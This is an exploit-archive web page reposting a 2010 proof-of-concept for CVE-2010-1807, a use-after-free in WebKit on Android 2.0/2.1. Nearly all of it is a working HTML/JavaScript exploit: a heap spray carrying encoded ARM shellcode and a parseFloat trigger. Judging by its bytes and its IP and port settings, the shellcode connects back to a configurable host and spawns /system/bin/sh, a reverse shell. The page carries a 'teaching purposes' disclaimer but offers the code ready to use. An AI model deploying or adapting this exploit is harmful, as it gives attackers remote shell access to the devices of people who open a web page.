首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Android 2.0/2.1 Use-After-Free Remote Code Execution on Webkit
来源:http://imthezuk.blogspot.com 作者:Avraham 发布时间:2010-11-16  

# Exploit Title: Android 2.0/2.1 Use-After-Free Remote Code Execution on
Webkit
# Date: 14/11/2010
# Author: Itzhak Avraham, mj
# Tested on: Droid 2.1
# CVE : CVE-2010-1807


*Better exploit (better rate and more flexible for changes, also shorter
shellcode) than what you have, plus, it's also verified. Enjoy!
More details at : *
http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html*


<html>
<head>
<script>
//This code is only for security researches/teaching purposes,use at your own risk!

// bug   =  webkit remote code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
//patched=  android 2.2, some said it works on some devices with 2.2.
//originally noticed/written by mj(good job man!)
//new exploit version by Itzhak Zuk Avraham (itz2000[AT]GMAIL[DOT]COM) - http://imthezuk.blogspot.com

var ip = unescape("\ua8c0\u0100"); // ip = 192.168.0.1
var port = unescape("\u3930"); //port 12345 (hex(0x3039))
//var ip = e.g: unescape("\u000a\u0202"); //ip = 10.0.2.2

function trigger()
        {
  var span = document.createElement("div");
  document.getElementById("BodyID").appendChild(span);
  span.innerHTML = -parseFloat("NAN(ffffe00572c60)"); //trigger use-after-free
        }
function exploit()
        {   
 var nop = unescape("\u33bc\u0057"); //LDREQH R3,[R7],-0x3C for nopping
 do
 {
  nop+=nop;
 } while (nop.length<=0x1000);
        var scode = nop+unescape("\u1001\ue1a0\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
 scode += port;
 scode += ip;
 scode += unescape("\u2000\u2000");
        target = new Array();
        for(i = 0; i < 0x1000; i++)
           target[i] = scode;
        for (i = 0; i <= 0x1000; i++)
        {
         document.write(target[i]+"<i>");
                if (i>0x999)
         {
          trigger();
         }
        }
}
</script>
</head>
<body id="BodyID">
Enjoy!
<script>
 exploit();
</script>
</body>
</html>

Twitter account : @ihackbanme


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Foxit Reader 4.1.1 Stack Overf
·Safari 5.02 Stack Overflow Den
·Axis2 / SAP BusinessObjects ds
·Realtek HD Audio Control Panel
·NetWare 6.5 SunRPC Portmapper
·Realtek Audio Microphone Calib
·Realtek Audio Control Panel 1.
·Trend Micro Internet Security
·Foxit Reader 4.1.1 Stack Buffe
·DBSite Remote SQL Injection Vu
·DIZzy 1.12 Local Stack Overflo
·Camtron CMNC-200 IP Camera Den
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved